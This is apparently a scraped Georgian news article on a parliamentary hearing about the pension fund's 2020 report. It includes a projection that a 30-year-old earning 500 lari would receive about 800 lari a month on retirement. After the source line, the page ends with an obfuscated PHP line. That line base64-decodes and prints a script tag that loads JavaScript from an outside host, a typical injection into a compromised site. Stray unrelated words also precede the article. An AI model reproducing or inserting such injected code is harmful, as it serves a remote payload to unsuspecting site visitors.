celsiusi
ავერსი შნაიდერი
პარლამენტში დღეს საპენსიო ფონდის 2020 წლის ფინანსური ანგარიშის მოსმენა გაიმართა. დეპუტატებმა სააგენტოს დირექტორს დაუსვეს კითხვა, თუ რა იქნება დღევანდელი დასაქმებულის საპენსიო სარგებელი მისი პენსიაზე გასვლის დროისთვის იმ პირობებში, თუკი მას ამჟამად 500 ლარის ხელფასი აქვს. ამ კითხვას საპენსიო სააგენტოს მთავარმა საინვესტიციო ოფიცერმა გოგა მელიქიძემ უპასუხა და თქვა, რომ არსებული მდგომარეობით მსგავსი შემოსავლის მქონე პირის სამომავლო საპენსიო შემოსავალი თვეში 800 ლარი იქნება.
 
“მიმდინარე დათვლებით, თუკი ადამიანს 500 ლარი აქვს ხელფასი და ამჟამად 30 წლის არის, საპენსიო ასაკის მიღწევისას მისი დანაზოგი იქნება 141,000 ლარი და ყოველთვიური პენსია იქნება სადღაც 800 ლარი,”- განაცხადა გოგა მელიქიძემ.
 
30 წლის შემდეგ ასაღები 800 ლარის რეალური მსყიდველუნარიანობა მომავალში ინფლაციის ფაქტობრივ მაჩვენებელზე იქნება დამოკიდებული.
 
რა სარგებელი ერიცხება მოქალაქეთა საპენსიო დანაზოგებს?
 
ამჟამად საპენსიო სისტემაში 1,145,808 ადამიანი მონაწილეობს. დღეისთვის საპენსიო ფონდის აქტივების მოცულობა 1.5 მილიარდ ლარს შეადგენს, საიდანაც 150 მილიონი ლარი მოქალაქეთა საპენსიო დანაზოგებზე დარიცხული საპროცენტო სარგებელია. საპენსიო სააგენტოს ინფორმაციით, საპენსიო დანაზოგების უდიდესი ნაწილი კომერციული ბანკების მიერ გამოშვებულ სადეპოზიტო სერტიფიკატებში არის ინვესტირებული მისი ეფექტური წლიური საპროცენტო განაკვეთი კი 11%-ს შეადგენს.
 
წყარო: BMG
1526
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");